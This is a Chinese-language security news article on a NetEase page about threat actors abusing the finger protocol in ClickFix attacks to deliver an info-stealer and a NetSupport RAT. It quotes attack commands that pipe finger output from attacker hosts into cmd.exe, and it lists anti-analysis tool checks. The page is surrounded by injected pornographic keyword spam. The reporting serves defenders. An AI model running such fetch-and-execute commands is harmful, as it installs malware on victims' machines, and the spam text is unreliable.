<cite id="ffb66"></cite><cite id="ffb66"><track id="ffb66"></track></cite>
      <legend id="ffb66"><li id="ffb66"></li></legend>
      色婷婷久,激情色播,久久久无码专区,亚洲中文字幕av,国产成人A片,av无码免费,精品久久国产,99视频精品3
      網易首頁 > 網易號 > 正文 申請入駐

      Finger協議遭濫用 淪為 ClickFix 惡意軟件攻擊工具

      0
      分享至


      有著數十年歷史的finger協議正重新活躍,威脅者借助這一協議獲取遠程指令,在Windows設備上執行惡意操作。

      過去,人們通過Finger協議,在Unix與Linux系統中使用finger命令查詢本地及遠程用戶信息,該命令后續也被加入Windows系統。盡管目前仍受支持,但相較于數十年前的普及度,如今其使用率已大幅下降。

      執行finger命令后,會返回用戶的基礎信息,包括登錄名、用戶名(若在/etc/passwd中設置)、主目錄、電話號碼、最后活躍時間及其他詳情。


      手指命令輸出

      近期,多起惡意攻擊活動開始利用Finger協議,疑似通過“ClickFix攻擊”獲取指令并在設備上執行。

      這并非finger命令首次被如此濫用——早在2020年,研究人員就曾發出警告,指出該命令已被用作“ Living-off-the-Land Binary( LOLBIN,合法系統工具濫用)”,用于下載惡意軟件并規避檢測。


      finger命令遭惡意濫用

      上月,網絡安全研究員分享了一個批處理文件。該文件執行后,會運行“finger root@finger.nateams[.]com”命令,從遠程finger服務器獲取指令,再通過管道符傳遞給cmd.exe在本地執行。


      手指命令輸出

      目前該服務器已無法訪問,但MalwareHunterTeam又發現了更多利用finger命令的惡意軟件樣本與攻擊活動。例如,Reddit平臺上有用戶近期發文警示,稱自己遭遇了一場偽裝成驗證碼驗證的ClickFix攻擊——攻擊者誘導其運行一條Windows命令,以“證明自己是人類”。

      盡管目前該服務器已不再響應finger請求,但另一位Reddit用戶捕獲了此前的輸出結果。這類攻擊將Finger協議用作遠程腳本傳輸工具:通過運行“finger vke@finger.cloudmega[.]org”命令,將輸出結果通過管道符傳遞給Windows命令處理器cmd.exe。

      這一操作會觸發獲取到的指令執行:創建隨機命名的路徑,將curl.exe復制為隨機文件名,通過重命名后的curl程序從cloudmega[.]org下載偽裝成PDF文件的壓縮包,并解壓出一個Python惡意軟件包。


      偽裝成PDF的檔案內容

      隨后,系統會通過“pythonw.exe __init__.py”命令執行該Python程序。最終執行的指令會向攻擊者的服務器回傳“執行成功”的確認信息,同時向用戶顯示偽造的“驗證你是人類”提示框。

      目前尚不清楚該Python惡意軟件包的具體用途,但從一個關聯批處理文件可推斷,其應為一款信息竊取工具。

      安全員還發現了另一項類似攻擊活動:通過“finger Kove2@api.metrics-strange.com | cmd”命令獲取并執行指令,操作流程與上述ClickFix攻擊幾乎一致。


      finger命令的輸出

      分析發現,這一攻擊手段更為成熟——指令會先檢測設備中是否存在惡意軟件研究常用工具,若發現則終止攻擊。這些工具包括filemon、regmon、procexp、procexp64、tcpview、tcpview64、Procmon、Procmon64、vmmap、vmmap64、portmon、processlasso、Wireshark、Fiddler Everywhere、Fiddler、ida、ida64、ImmunityDebugger、WinDump、x64dbg、x32dbg、OllyDbg及ProcessHacker。

      若未檢測到惡意軟件分析工具,指令會下載偽裝成PDF的壓縮包并解壓。但與此前不同的是,該壓縮包中并非Python惡意軟件包,而是NetSupport Manager遠程訪問工具(RAT)安裝包。


      NetSupport Manager RAT

      隨后,指令會配置一個計劃任務,確保用戶登錄時自動啟動該遠程訪問惡意軟件。

      目前來看,此類finger命令濫用活動似乎由單一威脅者發起,且主要通過ClickFix攻擊實施。但鑒于仍有用戶持續上當,相關攻擊活動需引起高度警惕。

      對于防御方而言,阻止finger命令濫用的最佳方式是攔截流向TCP 79端口的出站流量——該端口是Finger協議用于連接守護進程的專用端口。

      參考及來源:https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/

      特別聲明:以上內容(如有圖片或視頻亦包括在內)為自媒體平臺“網易號”用戶上傳并發布,本平臺僅提供信息存儲服務。

      Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

      相關推薦
      熱點推薦
      自信爆棚!張本智和再出狂言:明年目標包攬三大賽冠軍 網友熱議

      自信爆棚!張本智和再出狂言:明年目標包攬三大賽冠軍 網友熱議

      大秦壁虎白話體育
      2025-12-17 17:22:27
      出大事了,日本鬧出“國際笑話”,高市或被迫下臺?美俄警告日本

      出大事了,日本鬧出“國際笑話”,高市或被迫下臺?美俄警告日本

      文史旺旺旺
      2025-12-16 19:01:25
      鞠婧祎偷雞不成蝕把米!這下好了,全世界都知道內娛賺錢有多瘋了

      鞠婧祎偷雞不成蝕把米!這下好了,全世界都知道內娛賺錢有多瘋了

      樂悠悠娛樂
      2025-12-17 10:25:53
      馬斯克坦言,在中國,光靠微信就能把生活全管了,但它又不算壟斷

      馬斯克坦言,在中國,光靠微信就能把生活全管了,但它又不算壟斷

      我心縱橫天地間
      2025-12-07 15:52:53
      接受敗訴?巴黎官宣執行6100萬賠償+公示1個月!祝姆巴佩未來順利

      接受敗訴?巴黎官宣執行6100萬賠償+公示1個月!祝姆巴佩未來順利

      我愛英超
      2025-12-16 22:21:29
      沐曦股份漲超700% 總市值超越摩爾線程

      沐曦股份漲超700% 總市值超越摩爾線程

      財聯社
      2025-12-17 10:26:04
      2-0!亞馬爾送助攻,2億超巨閃耀,拉什福德自我救贖,巴薩6連勝

      2-0!亞馬爾送助攻,2億超巨閃耀,拉什福德自我救贖,巴薩6連勝

      我的護球最獨特
      2025-12-17 06:21:28
      善惡有報,移居英國僅2年,57歲吳秀波再迎噩耗,步入李易峰后塵

      善惡有報,移居英國僅2年,57歲吳秀波再迎噩耗,步入李易峰后塵

      鄉野小珥
      2025-12-17 12:54:57
      扛不住了?六國收到求援信息,高市賭中國不敢動手,連收四重噩耗

      扛不住了?六國收到求援信息,高市賭中國不敢動手,連收四重噩耗

      知鑒明史
      2025-12-16 18:55:22
      金正恩帶妻子女兒一起亮相了!12歲千金穿黑色大衣美翻,不輸媽媽

      金正恩帶妻子女兒一起亮相了!12歲千金穿黑色大衣美翻,不輸媽媽

      時尚麗人風行
      2025-12-17 09:56:25
      馬英九:若大陸統一臺灣的手段不和平,過程不民主,臺灣人不接受

      馬英九:若大陸統一臺灣的手段不和平,過程不民主,臺灣人不接受

      近史談
      2025-08-23 14:31:59
      4名男子喝酒,綠衣男子一言不合就摔酒瓶,網友:下次沒人喊他了

      4名男子喝酒,綠衣男子一言不合就摔酒瓶,網友:下次沒人喊他了

      唐小糖說情感
      2025-12-17 21:08:54
      張柏芝說漏嘴,三胎兒子生父終于有眉目了!謝霆鋒不用再背黑鍋

      張柏芝說漏嘴,三胎兒子生父終于有眉目了!謝霆鋒不用再背黑鍋

      娛樂團長
      2025-12-17 12:45:06
      1931年,周恩來帶人處決叛徒顧順章家人,放過3小孩,卻釀成禍患

      1931年,周恩來帶人處決叛徒顧順章家人,放過3小孩,卻釀成禍患

      獅拓一葉知秋
      2024-08-23 21:46:48
      中國4位鷹派人物:有人揚言滅掉小日本,有人要摧毀美國數百座城

      中國4位鷹派人物:有人揚言滅掉小日本,有人要摧毀美國數百座城

      大千世界觀
      2025-12-16 19:42:22
      孟子義頂流咖位,簡直是直接開掛的存在。

      孟子義頂流咖位,簡直是直接開掛的存在。

      動物奇奇怪怪
      2025-12-15 11:41:35
      武昌萬隆廣場被逼停電停業,優化營商環境刻不容緩

      武昌萬隆廣場被逼停電停業,優化營商環境刻不容緩

      寒潭渡影
      2025-12-16 12:40:39
      性能力與壽命關系被發現!男性40歲后,睪酮越高,死亡風險越低

      性能力與壽命關系被發現!男性40歲后,睪酮越高,死亡風險越低

      藥師說健康
      2025-12-05 09:47:10
      辣眼“知情人”曝料已婚知名大導演追求北電女學生,聊天記錄臉紅

      辣眼“知情人”曝料已婚知名大導演追求北電女學生,聊天記錄臉紅

      天天熱點見聞
      2025-12-16 16:57:46
      二手房全線下跌!貝殼掛牌量高達650萬套房子,房子太多太多了

      二手房全線下跌!貝殼掛牌量高達650萬套房子,房子太多太多了

      小星球探索
      2025-12-16 12:53:59
      2025-12-17 21:47:00
      嘶吼RoarTalk incentive-icons
      嘶吼RoarTalk
      不一樣的互聯網安全新視界
      8090文章數 10543關注度
      往期回顧 全部

      科技要聞

      特斯拉值1.6萬億靠畫餅 Waymo值千億靠跑單

      頭條要聞

      館藏《江南春》現身拍賣市場 捐贈方:為何名畫"消失"

      頭條要聞

      館藏《江南春》現身拍賣市場 捐贈方:為何名畫"消失"

      體育要聞

      短短一年,從爭冠到0勝墊底...

      娛樂要聞

      狗仔曝熱播劇姐弟戀真談了???

      財經要聞

      重磅信號!收入分配制度或迎重大突破

      汽車要聞

      一車多動力+雙姿態 長城歐拉5上市 限時9.18萬元起

      態度原創

      本地
      健康
      家居
      公開課
      軍事航空

      本地新聞

      云游安徽|踏過戰壕與石板,讀一部活的淮北史

      這些新療法,讓化療不再那么痛苦

      家居要聞

      溫馨獨棟 駝色與淺色碰撞

      公開課

      李玫瑾:為什么性格比能力更重要?

      軍事要聞

      最新現場:山東艦完成年度最后一次海上訓練

      無障礙瀏覽 進入關懷版 主站蜘蛛池模板: 久久18禁| 蜜桃av色偷偷av老熟女| 午夜成人亚洲理伦片在线观看 | 秋霞无码一区二区| 亚洲天堂av 在线| 超碰人妻在线| 伊宁县| 国产无套精品一区二区| 四库影院永久国产精品| 起碰免费公开97在线视频| 鲁一鲁色一色| 尹人视频99| 成年女人永久免费观看视频 | www插插插无码视频网站| 四虎影视久久久免费观看| 亚洲国产日韩a在线播放| 亚洲资源站| 色翁荡媳又硬又粗又长视频| a男人的天堂久久a毛片| 亚洲图片另类| 樟树市| 国自产拍偷拍精品啪啪一区二区| 精品国产人成亚洲区| 久久久精品2019中文字幕之3| 夜夜操影院| 成熟了的熟妇毛茸茸| 老色鬼在线精品视频在线观看 | 少妇伦子伦精品无吗| 中文字幕av免费专区| 口爆视频| 石景山区| 五十路丰满中年熟女中出| 偷拍精品一区二区三区 | 夜精品a片一区二区三区无码白浆 久久久久亚洲精品中文字幕 | 免费VA国产高清大片在线| 国产区成人精品视频| 国产高h| 亚洲综合精品香蕉久久网| 日本丰满熟妇videossex8k| 国产激情з∠视频一区二区| 亚洲精品久久久久国产|